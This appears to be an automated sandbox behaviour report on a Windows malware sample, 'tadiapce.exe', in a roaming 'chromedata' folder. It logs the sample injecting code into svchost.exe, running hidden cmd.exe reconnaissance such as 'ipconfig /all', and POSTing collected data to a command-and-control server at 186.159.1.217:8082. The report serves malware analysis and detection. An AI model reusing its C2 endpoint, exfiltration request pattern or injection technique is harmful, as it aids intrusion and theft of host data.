System	Sleep	duration = 30000 milliseconds (30.000 seconds)	1	Fn

Process #40: svchost.exe

359

Information	Value
ID	#40
File Name	c:\windows\system32\svchost.exe
Command Line	svchost.exe
Initial Working Directory	C:\Users\2XC7u663GxWc\AppData\Roaming\chromedata\
Monitor	Start Time: 00:03:34, Reason: Child Process
Unmonitor	End Time: 00:04:16, Reason: Terminated by Timeout
Monitor Duration	00:00:42

OS Process Information

Information	Value
PID	0xa70
Parent PID	0x214 (c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe)
Bitness	32-bit
Is Created or Modified Executable
Integrity Level	Medium
Username	ZGW5TDPU\2XC7u663GxWc
Enabled Privileges	SeChangeNotifyPrivilege
Thread IDs	0x A6C 0x A68 0x 31C 0x 660 0x B90 0x C00 0x 5D0 0x F4C 0x F48

Injection Information

Injection Type	Source Process	Source Os Thread ID	Information	Count	Logfile
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x50000, size = 367	1	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x60000, size = 112	64	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x602104, size = 12	1	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x10000000, size = 1024	1	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x10001000, size = 9216	2	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x10004000, size = 7168	2	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x10006000, size = 1036	1	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x10006000, size = 512	1	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x10007000, size = 1024	2	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x20000, size = 22	3	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x70000, size = 12	7	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x20000, size = 16	8	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x100040ec, size = 4	1	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x20000, size = 26	4	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x10004000, size = 4	1	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x20000, size = 24	1	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x20000, size = 17	6	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x70000, size = 16	50	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x100040d0, size = 4	1	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x100040d4, size = 4	1	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x100040d8, size = 4	1	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x20000, size = 14	3	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x100040dc, size = 4	1	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x20000, size = 20	6	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x100040e0, size = 4	1	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x100040e4, size = 4	1	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x20000, size = 12	2	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x10004008, size = 4	1	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x1000400c, size = 4	1	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x20000, size = 13	3	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x10004010, size = 4	1	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x10004014, size = 4	1	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x20000, size = 9	6	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x10004018, size = 4	1	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x1000401c, size = 4	1	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x10004020, size = 4	1	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x10004024, size = 4	1	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x20000, size = 15	6	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x10004028, size = 4	1	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x20000, size = 19	1	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x1000402c, size = 4	1	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x10004030, size = 4	1	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x20000, size = 11	4	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x10004034, size = 4	1	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x10004038, size = 4	1	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x1000403c, size = 4	1	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x10004040, size = 4	1	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x10004044, size = 4	1	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x10004048, size = 4	1	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x20000, size = 10	3	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x1000404c, size = 4	1	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x10004050, size = 4	1	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x10004054, size = 4	1	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x10004058, size = 4	1	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x1000405c, size = 4	1	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x10004060, size = 4	1	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x10004064, size = 4	1	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x20000, size = 21	3	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x10004068, size = 4	1	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x1000406c, size = 4	1	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x10004070, size = 4	1	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x10004074, size = 4	1	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x10004078, size = 4	1	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x1000407c, size = 4	1	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x10004080, size = 4	1	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x20000, size = 25	2	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x10004084, size = 4	1	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x10004088, size = 4	1	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x1000408c, size = 4	1	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x10004090, size = 4	1	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x20000, size = 6	1	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x10004094, size = 4	1	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x10004098, size = 4	1	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x100040c4, size = 4	1	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x100040c8, size = 4	1	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x100040f4, size = 4	1	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x20000, size = 18	1	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x100040f8, size = 4	1	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x100040fc, size = 4	1	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x10004100, size = 4	1	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x10004104, size = 4	1	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x100040a0, size = 4	1	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x100040a4, size = 4	1	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x100040a8, size = 4	1	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x70000, size = 8	1	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x250000, size = 747	1	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x260000, size = 1024	1	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x480000, size = 128	1	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x4a0000, size = 44	1	Fn Data

Threads

Thread 0xa6c

156

Category	Operation	Information	Count	Logfile
Module	Load	module_name = WS2_32.dll, base_address = 0x75a90000	1	Fn
Module	Get Address	module_name = c:\windows\system32\ws2_32.dll, function = 115, address_out = 0x75a93ab2	1	Fn
Module	Load	module_name = ACTIVEDS.dll, base_address = 0x6eb70000	1	Fn
Module	Get Address	module_name = c:\windows\system32\activeds.dll, function = 9, address_out = 0x6eb716e6	1	Fn
Module	Load	module_name = WININET.dll, base_address = 0x77230000	1	Fn
Module	Get Address	module_name = c:\windows\system32\wininet.dll, function = InternetConnectW, address_out = 0x7725492c	1	Fn
Module	Get Address	module_name = c:\windows\system32\wininet.dll, function = InternetReadFile, address_out = 0x7724b406	1	Fn
Module	Get Address	module_name = c:\windows\system32\wininet.dll, function = HttpSendRequestW, address_out = 0x7725ba12	1	Fn
Module	Get Address	module_name = c:\windows\system32\wininet.dll, function = InternetOpenW, address_out = 0x77259197	1	Fn
Module	Get Address	module_name = c:\windows\system32\wininet.dll, function = InternetCloseHandle, address_out = 0x7724ab49	1	Fn
Module	Get Address	module_name = c:\windows\system32\wininet.dll, function = HttpOpenRequestW, address_out = 0x77254a42	1	Fn
Module	Load	module_name = KERNEL32.dll, base_address = 0x76b10000	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = CloseHandle, address_out = 0x76b5ca7c	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = Process32FirstW, address_out = 0x76b4fa35	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = CreateThread, address_out = 0x76b6375d	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = DeleteCriticalSection, address_out = 0x77389ac5	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = lstrcatA, address_out = 0x76b5a19f	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = lstrcpyA, address_out = 0x76b59793	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = TerminateThread, address_out = 0x76b622a7	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = GetSystemDirectoryA, address_out = 0x76b58fc5	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = Process32NextW, address_out = 0x76b4faca	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = SetConsoleOutputCP, address_out = 0x76bbe210	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = CreateProcessA, address_out = 0x76b12082	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = HeapCreate, address_out = 0x76b63ea2	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = GetModuleHandleA, address_out = 0x76b5cf41	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = LoadLibraryA, address_out = 0x76b6395c	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = GetProcAddress, address_out = 0x76b633d3	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = HeapFree, address_out = 0x76b5bbd0	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = lstrlenW, address_out = 0x76b5d9e8	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = lstrcpynW, address_out = 0x76b76118	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = MultiByteToWideChar, address_out = 0x76b6452b	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = HeapAlloc, address_out = 0x77382dd6	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = GetProcessHeap, address_out = 0x76b61280	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = lstrlenA, address_out = 0x76b5a611	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = HeapReAlloc, address_out = 0x7739ff51	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = ReadFile, address_out = 0x76b596fb	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = SetHandleInformation, address_out = 0x76b48856	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = EnterCriticalSection, address_out = 0x773777a0	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = LeaveCriticalSection, address_out = 0x77377760	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = CreatePipe, address_out = 0x76b735b7	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = InitializeCriticalSection, address_out = 0x7738a149	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = PeekNamedPipe, address_out = 0x76b9f74b	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = WaitForSingleObject, address_out = 0x76b5ba90	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = FreeLibraryAndExitThread, address_out = 0x76b4fdb8	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = GetLastError, address_out = 0x76b5bf00	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = ExitThread, address_out = 0x7735f611	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = CreateToolhelp32Snapshot, address_out = 0x76b4f731	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = Sleep, address_out = 0x76b5ba46	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = WideCharToMultiByte, address_out = 0x76b6450e	1	Fn
Module	Load	module_name = USER32.dll, base_address = 0x76c00000	1	Fn
Module	Get Address	module_name = c:\windows\system32\user32.dll, function = wsprintfW, address_out = 0x76c2426d	1	Fn
Module	Get Address	module_name = c:\windows\system32\user32.dll, function = wvsprintfA, address_out = 0x76c13c94	1	Fn
Module	Load	module_name = ole32.dll, base_address = 0x76cd0000	1	Fn
Module	Get Address	module_name = c:\windows\system32\ole32.dll, function = IIDFromString, address_out = 0x76ce2ff2	1	Fn
Module	Get Address	module_name = c:\windows\system32\ole32.dll, function = CoSetProxyBlanket, address_out = 0x76ce5ea5	1	Fn
Module	Get Address	module_name = c:\windows\system32\ole32.dll, function = CoCreateInstance, address_out = 0x76d19d0b	1	Fn
Module	Get Address	module_name = c:\windows\system32\ole32.dll, function = CoUninitialize, address_out = 0x76d186d3	1	Fn
Module	Get Address	module_name = c:\windows\system32\ole32.dll, function = CoInitializeEx, address_out = 0x76d109ad	1	Fn
Module	Load	module_name = OLEAUT32.dll, base_address = 0x76a60000	1	Fn
Module	Get Address	module_name = c:\windows\system32\oleaut32.dll, function = 9, address_out = 0x76a63eae	1	Fn
Module	Get Address	module_name = c:\windows\system32\oleaut32.dll, function = 185, address_out = 0x76a807cd	1	Fn
Module	Get Address	module_name = c:\windows\system32\oleaut32.dll, function = 94, address_out = 0x76a86ba7	1	Fn
Module	Get Address	module_name = c:\windows\system32\oleaut32.dll, function = 6, address_out = 0x76a63e59	1	Fn
Module	Get Address	module_name = c:\windows\system32\oleaut32.dll, function = 20, address_out = 0x76a7e173	1	Fn
Module	Get Address	module_name = c:\windows\system32\oleaut32.dll, function = 25, address_out = 0x76a7ea56	1	Fn
Module	Get Address	module_name = c:\windows\system32\oleaut32.dll, function = 19, address_out = 0x76a7e127	1	Fn
Module	Get Address	module_name = c:\windows\system32\oleaut32.dll, function = 8, address_out = 0x76a63ed5	1	Fn
Module	Get Handle	module_name = c:\windows\system32\msvcrt.dll, base_address = 0x76f80000	1	Fn
Module	Get Address	module_name = c:\windows\system32\msvcrt.dll, function = _wtoi, address_out = 0x76f8c823	1	Fn
Module	Get Address	module_name = c:\windows\system32\msvcrt.dll, function = _snwprintf_s, address_out = 0x76f9141b	1	Fn
Module	Get Address	module_name = c:\windows\system32\msvcrt.dll, function = _vsnwprintf_s, address_out = 0x76f913b4	1	Fn

Thread 0xa68

203

Category	Operation	Information	Count	Logfile
Process	Enumerate Processes	-	1	Fn
Process	Enumerate Processes	-	1	Fn
Process	Enumerate Processes	-	1	Fn
Process	Enumerate Processes	-	1	Fn
Process	Enumerate Processes	-	1	Fn
Process	Enumerate Processes	-	1	Fn
Process	Enumerate Processes	-	1	Fn
Process	Enumerate Processes	-	1	Fn
Process	Enumerate Processes	-	1	Fn
Process	Enumerate Processes	-	1	Fn
Process	Enumerate Processes	-	1	Fn
Process	Enumerate Processes	-	1	Fn
Process	Enumerate Processes	-	1	Fn
Process	Enumerate Processes	-	1	Fn
Process	Enumerate Processes	-	1	Fn
Process	Enumerate Processes	-	1	Fn
Process	Enumerate Processes	-	1	Fn
Process	Enumerate Processes	-	1	Fn
Process	Enumerate Processes	-	1	Fn
Process	Enumerate Processes	-	1	Fn
Process	Enumerate Processes	-	1	Fn
Process	Enumerate Processes	-	1	Fn
Process	Enumerate Processes	-	1	Fn
Process	Enumerate Processes	-	1	Fn
Process	Enumerate Processes	-	1	Fn
Process	Enumerate Processes	-	1	Fn
Process	Enumerate Processes	-	1	Fn
Process	Enumerate Processes	-	1	Fn
Process	Enumerate Processes	-	1	Fn
Process	Enumerate Processes	-	1	Fn
Process	Enumerate Processes	-	1	Fn
Process	Enumerate Processes	-	1	Fn
Process	Enumerate Processes	-	1	Fn
Process	Enumerate Processes	-	1	Fn
Process	Enumerate Processes	-	1	Fn
Process	Enumerate Processes	-	1	Fn
Process	Enumerate Processes	-	1	Fn
Process	Enumerate Processes	-	1	Fn
Process	Enumerate Processes	-	1	Fn
Process	Enumerate Processes	-	1	Fn
Process	Enumerate Processes	-	1	Fn
Process	Enumerate Processes	-	1	Fn
Process	Enumerate Processes	-	1	Fn
Process	Enumerate Processes	-	1	Fn
Process	Enumerate Processes	-	1	Fn
Process	Enumerate Processes	-	1	Fn
Process	Enumerate Processes	-	1	Fn
Process	Enumerate Processes	-	1	Fn
Process	Enumerate Processes	-	1	Fn
Process	Enumerate Processes	-	1	Fn
Process	Enumerate Processes	-	1	Fn
Process	Enumerate Processes	-	1	Fn
COM	Create	interface = DC12A687-737F-11CF-884D-00AA004B2E24, cls_context = CLSCTX_INPROC_SERVER	1	Fn
File	Create Pipe	pipe_name = Anonymous read pipe, size = 0	1	Fn
File	Create Pipe	pipe_name = Anonymous read pipe, size = 0	1	Fn
System	Get Info	type = System Directory, result_out = C:\Windows\system32	1	Fn
Process	Create	process_name = C:\Windows\system32\cmd.exe, os_pid = 0x3ec, startup_flags = STARTF_USESHOWWINDOW, STARTF_USESTDHANDLES, show_window = SW_HIDE	1	Fn
System	Sleep	duration = 10000 milliseconds (10.000 seconds)	1	Fn
File	Read	size = 1024, size_out = 1024	1	Fn Data
File	Read	size = 607, size_out = 607	1	Fn Data
File	Create Pipe	pipe_name = Anonymous read pipe, size = 0	1	Fn
File	Create Pipe	pipe_name = Anonymous read pipe, size = 0	1	Fn
System	Get Info	type = System Directory, result_out = C:\Windows\system32	1	Fn
Process	Create	process_name = C:\Windows\system32\cmd.exe, os_pid = 0xa50, startup_flags = STARTF_USESHOWWINDOW, STARTF_USESTDHANDLES, show_window = SW_HIDE	1	Fn
System	Sleep	duration = 10000 milliseconds (10.000 seconds)	1	Fn
File	Read	size = 580, size_out = 580	1	Fn Data
File	Create Pipe	pipe_name = Anonymous read pipe, size = 0	1	Fn
File	Create Pipe	pipe_name = Anonymous read pipe, size = 0	1	Fn
System	Get Info	type = System Directory, result_out = C:\Windows\system32	1	Fn
Process	Create	process_name = C:\Windows\system32\cmd.exe, os_pid = 0xbb4, startup_flags = STARTF_USESHOWWINDOW, STARTF_USESTDHANDLES, show_window = SW_HIDE	1	Fn
System	Sleep	duration = 10000 milliseconds (10.000 seconds)	12	Fn
File	Create Pipe	pipe_name = Anonymous read pipe, size = 0	1	Fn
File	Create Pipe	pipe_name = Anonymous read pipe, size = 0	1	Fn
System	Get Info	type = System Directory, result_out = C:\Windows\system32	1	Fn
Process	Create	process_name = C:\Windows\system32\cmd.exe, os_pid = 0xd70, startup_flags = STARTF_USESHOWWINDOW, STARTF_USESTDHANDLES, show_window = SW_HIDE	1	Fn
System	Sleep	duration = 10000 milliseconds (10.000 seconds)	12	Fn
File	Create Pipe	pipe_name = Anonymous read pipe, size = 0	1	Fn
File	Create Pipe	pipe_name = Anonymous read pipe, size = 0	1	Fn
System	Get Info	type = System Directory, result_out = C:\Windows\system32	1	Fn
Process	Create	process_name = C:\Windows\system32\cmd.exe, os_pid = 0xed0, startup_flags = STARTF_USESHOWWINDOW, STARTF_USESTDHANDLES, show_window = SW_HIDE	1	Fn
System	Sleep	duration = 10000 milliseconds (10.000 seconds)	12	Fn
File	Create Pipe	pipe_name = Anonymous read pipe, size = 0	1	Fn
File	Create Pipe	pipe_name = Anonymous read pipe, size = 0	1	Fn
System	Get Info	type = System Directory, result_out = C:\Windows\system32	1	Fn
Process	Create	process_name = C:\Windows\system32\cmd.exe, os_pid = 0xf1c, startup_flags = STARTF_USESHOWWINDOW, STARTF_USESTDHANDLES, show_window = SW_HIDE	1	Fn
System	Sleep	duration = 10000 milliseconds (10.000 seconds)	8	Fn
File	Read	size = 72, size_out = 72	1	Fn Data
COM	Create	interface = 5BB11929-AFD1-11D2-9CB9-0000F87A369E, cls_context = CLSCTX_INPROC_SERVER	1	Fn
Inet	Open Session	user_agent = test, access_type = INTERNET_OPEN_TYPE_PRECONFIG	1	Fn
Inet	Open Connection	protocol = HTTP, server_name = 186.159.1.217, server_port = 8082	1	Fn
Inet	Open HTTP Request	http_verb = POST, http_version = HTTP 1.1, target_resource = /tot478/ZGW5TDPU_W617601.1E8523426B2B0B3522CF81970B864611/90, accept_types = 0	1	Fn
Inet	Send HTTP Request	headers = Content-Type: multipart/form-data; boundary=Arasfjasu7, url = 186.159.1.217/tot478/ZGW5TDPU_W617601.1E8523426B2B0B3522CF81970B864611/90	1	Fn Data
Inet	Read Response	size = 127, size_out = 3	1	Fn Data
Inet	Read Response	size = 127, size_out = 0	1	Fn
Inet	Close Session	-	1	Fn
Inet	Close Session	-	1	Fn
Inet	Close Session	-	1	Fn

Process #43: cmd.exe

Information	Value
ID	#43
File Name	c:\windows\system32\cmd.exe
Command Line	/c ipconfig /all
Initial Working Directory	C:\Users\2XC7u663GxWc\AppData\Roaming\chromedata\
Monitor	Start Time: 00:03:38, Reason: Child Process
Unmonitor	End Time: 00:03:39, Reason: Self Terminated
Monitor Duration	00:00:01

OS Process Information

Information	Value
PID	0x3ec
Parent PID	0xa70 (c:\windows\system32\svchost.exe)
Bitness	32-bit
Is Created or Modified Executable
Integrity Level	Medium
Username	ZGW5TDPU\2XC7u663GxWc
Enabled Privileges	SeChangeNotifyPrivilege
Thread IDs	0x 208

Threads

Thread 0x208

Category	Operation	Information	Count	Logfile
System	Get Time	type = System Time, time = 2019-05-14 15:33:44 (UTC)	1	Fn
System	Get Time	type = Ticks, time = 11062982	1	Fn
System	Get Time	type = Performance Ctr, time = 29218372871	1	Fn
Module	Get Handle	module_name = c:\windows\system32\cmd.exe, base_address = 0x4a590000	1	Fn
Module	Get Handle	module_name = c:\windows\system32\kernel32.dll, base_address = 0x76b10000	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = SetThreadUILanguage, address_out = 0x76b624c2	1	Fn
Registry	Open Key	reg_name = HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System	1	Fn
File	Open	filename = STD_OUTPUT_HANDLE	2	Fn
File	Open	filename = STD_INPUT_HANDLE	1	Fn
Environment	Get Environment String	-	2	Fn Data
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor	1	Fn
